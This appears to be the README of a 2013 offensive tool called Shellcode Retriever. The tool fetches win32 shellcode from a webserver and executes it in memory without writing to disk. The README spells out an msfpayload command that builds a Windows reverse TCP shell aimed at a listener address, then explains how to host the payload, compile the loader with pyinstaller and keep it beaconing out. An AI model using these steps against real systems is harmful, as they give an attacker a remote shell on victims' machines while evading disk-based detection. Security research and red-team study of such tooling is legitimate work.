Downloads win32 shellcode from webservers and executes the shellcode without it touching disk (using the following method: http://www.debasish.in/2012_04_01_archive.html)
For use by IT Security professionals and researchers.
Create shellcode using the following msfpayload command:
msfpayload windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=8080 EXITFUNC=thread R > test.txt
Notice the exit function, very important if you want the process to run and beacon out based on timeouts in the source code.
Upload the shellcode to your webserver.
Compile the python code to an executeable by using pyinstaller.
Shellcode Retriever Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com Copyright (C) 2013, Joshua Pitts License: GPLv3 This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. See <http://www.gnu.org/licenses/> for a copy of the GNU General Public License This program is to be used for only legal activities by IT security professionals and researchers. Author not responsible for malicious uses.